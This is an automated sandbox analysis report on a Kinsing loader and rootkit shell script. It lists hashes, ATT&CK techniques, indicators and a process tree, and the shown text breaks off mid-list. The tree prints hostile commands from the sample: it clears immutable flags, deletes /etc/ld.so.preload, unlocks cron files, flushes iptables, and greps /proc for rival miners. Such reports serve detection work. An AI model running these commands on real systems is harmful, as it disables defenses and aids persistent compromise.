kinsing | 76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68

Analysis

max time kernel
132s
max time network
80s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
24/02/2025, 03:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh
Size

15KB
MD5

3e05d09841a8168c2cab04a4ec85a02b
SHA1

99c6e8a79d5a2b0aa1e3dfd6d2505bcd5034d6f2
SHA256

76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68
SHA512

316dbcabb7e1f07e3122c103b871d40c510439cb88b087dd7f711b9f3be2545c0751aa4b4ad27349fa4df11e45af23cfd2883871310f268af57eb067f6164026
SSDEEP

384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJw7:trgXux7YJDj8OoJw7

Score

10^/10

kinsing kinsing_rootkit defense_evasion discovery exection loader persistence privilege_escalation rootkit

Malware Config

Signatures

Kinsing
Kinsing is a loader written in Golang.
loader kinsing
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
rootkit kinsing_rootkit

Kinsing Rootkit payload 1 IoCs

resource	yara_rule
behavioral4/files/fstream-17.dat	family_elf_kinsing_rootkit

Kinsing family
kinsing

Kinsing payload 1 IoCs

resource	yara_rule
behavioral4/files/fstream-16.dat	family_elf_kinsing_loader

Kinsing_rootkit family
kinsing_rootkit

Modifies the dynamic linker configuration file 2 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

exection persistence privilege_escalation defense_evasion

Shared Modules

T1129

Dynamic Linker Hijacking

T1574.006

description	ioc	Process
File opened for modification	/etc/ld.so.preload	76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1704	chmod
1710	chmod
1711	chmod
1684	chmod
1686	chmod
1695	chmod
1697	chmod
1702	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/etc/data/kinsing	1712	76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
718	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1432	sudo

Attempts to change immutable files 50 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1465	xargs
1491	xargs
1530	xargs
1548	xargs
1589	xargs
1610	xargs
1611	sed
714	chattr
1496	xargs
1523	xargs
1590	sed
1593	sed
1614	sed
1617	sed
1620	sed
1511	xargs
1518	xargs
1536	xargs
1596	sed
1604	xargs
1619	xargs
1639	xargs
1678	xargs
1441	uname
1470	xargs
1480	xargs
1592	xargs
1602	sed
1613	xargs
1616	xargs
1634	xargs
706	chattr
1554	xargs
1587	sed
1601	xargs
1673	xargs
1586	xargs
1501	xargs
1506	xargs
1599	sed
1608	sed
1622	xargs
1651	xargs
1475	xargs
1486	xargs
1542	xargs
1595	xargs
1598	xargs
1662	xargs
712	chattr

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 12 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1674	ps
1487	ps
1514	ps
1582	ps
1635	ps
1482	ps
1492	ps
1497	ps
1502	ps
1507	ps
1519	ps
1630	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/372/cmdline	ps
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/372/status	pkill
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/8/cmdline	pkill
File opened for reading	/proc/228/cmdline	ps
File opened for reading	/proc/148/cmdline	ps
File opened for reading	/proc/2/status	pkill
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/701/status	pkill
File opened for reading	/proc/680/cmdline	pkill
File opened for reading	/proc/24/cmdline	pkill
File opened for reading	/proc/filesystems	pkill
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/143/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/319/cmdline	pkill
File opened for reading	/proc/705/status	ps
File opened for reading	/proc/1676/stat	ps
File opened for reading	/proc/705/status	pkill
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/228/status	pkill
File opened for reading	/proc/228/status	pkill
File opened for reading	/proc/705/status	pkill
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/1492/status	ps
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/76/status	pkill
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/395/cmdline	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/143/status	pkill
File opened for reading	/proc/74/status	pkill
File opened for reading	/proc/701/cmdline	pkill
File opened for reading	/proc/319/status	pkill
File opened for reading	/proc/79/cmdline	pkill
File opened for reading	/proc/1448/cmdline	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/484/cmdline	ps
File opened for reading	/proc/519/cmdline	ps
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/79/status	pkill
File opened for reading	/proc/701/status	ps
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/67/status	pkill
File opened for reading	/proc/680/cmdline	pkill
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/114/cmdline	pkill
File opened for reading	/proc/165/cmdline	pkill
File opened for reading	/proc/699/status	pkill
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/1650/status	ps
File opened for reading	/proc/484/cmdline	pkill
File opened for reading	/proc/72/cmdline	ps
File opened for reading	/proc/19/stat	ps

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1387	ls

/tmp/76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh
/tmp/76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68.sh
1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:702
- /usr/bin/chattr
  chattr -i /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:706
- /bin/rm
  rm -f /etc/ld.so.preload
  2⤵
  PID:710
- /usr/bin/chattr
  chattr -R -ia /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:712
- /usr/bin/chattr
  chattr -ia /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:714
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:718
- /bin/grep
  grep exe
  2⤵
  PID:727
- /bin/ls
  ls -latrh /proc/1
  2⤵
  PID:726
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:732
- /bin/ls
  ls -latrh /proc/10
  2⤵
  PID:736
- /bin/grep
  grep exe
  2⤵
  PID:737
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:740
- /bin/grep
  grep exe
  2⤵
  PID:743
- /bin/ls
  ls -latrh /proc/104
  2⤵
  PID:742
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:747
- /bin/ls
  ls -latrh /proc/11
  2⤵
  PID:749
- /bin/grep
  grep exe
  2⤵
  PID:750
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:753
- /bin/ls
  ls -latrh /proc/113
  2⤵
  PID:756
- /bin/grep
  grep exe
  2⤵
  PID:757
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:760
- /bin/ls
  ls -latrh /proc/114
  2⤵
  PID:762
- /bin/grep
  grep exe
  2⤵
  PID:763
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:766
- /bin/ls
  ls -latrh /proc/12
  2⤵
  PID:768
- /bin/grep
  grep exe
  2⤵
  PID:769
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:771
- /bin/ls
  ls -latrh /proc/13
  2⤵
  PID:774
- /bin/grep
  grep exe
  2⤵
  PID:775
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:777
- /bin/grep
  grep exe
  2⤵
  PID:780
- /bin/ls
  ls -latrh /proc/14
  2⤵
  PID:779
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:782
- /bin/grep
  grep exe
  2⤵
  PID:785
- /bin/ls
  ls -latrh /proc/143
  2⤵
  PID:784
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:787
- /bin/grep
  grep exe
  2⤵
  PID:790
- /bin/ls
  ls -latrh /proc/148
  2⤵
  PID:789
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:792
- /bin/ls
  ls -latrh /proc/15
  2⤵
  PID:794
- /bin/grep
  grep exe
  2⤵
  PID:795
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:797
- /bin/ls
  ls -latrh /proc/16
  2⤵
  PID:799
- /bin/grep
  grep exe
  2⤵
  PID:800
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:802
- /bin/grep
  grep exe
  2⤵
  PID:805
- /bin/ls
  ls -latrh /proc/165
  2⤵
  PID:804
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:807
- /bin/ls
  ls -latrh /proc/17
  2⤵
  PID:809
- /bin/grep
  grep exe
  2⤵
  PID:810
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:812
- /bin/ls
  ls -latrh /proc/18
  2⤵
  PID:814
- /bin/grep
  grep exe
  2⤵
  PID:815
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:817
- /bin/ls
  ls -latrh /proc/19
  2⤵
  PID:819
- /bin/grep
  grep exe
  2⤵
  PID:820
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:822
- /bin/grep
  grep exe
  2⤵
  PID:825
- /bin/ls
  ls -latrh /proc/2
  2⤵
  PID:824
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:827
- /bin/grep
  grep exe
  2⤵
  PID:830
- /bin/ls
  ls -latrh /proc/20
  2⤵
  PID:829
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:832
- /bin/grep
  grep exe
  2⤵
  PID:835
- /bin/ls
  ls -latrh /proc/21
  2⤵
  PID:834
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:837
- /bin/ls
  ls -latrh /proc/22
  2⤵
  PID:839
- /bin/grep
  grep exe
  2⤵
  PID:840
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:842
- /bin/ls
  ls -latrh /proc/228
  2⤵
  PID:844
- /bin/grep
  grep exe
  2⤵
  PID:845
- /bin/grep
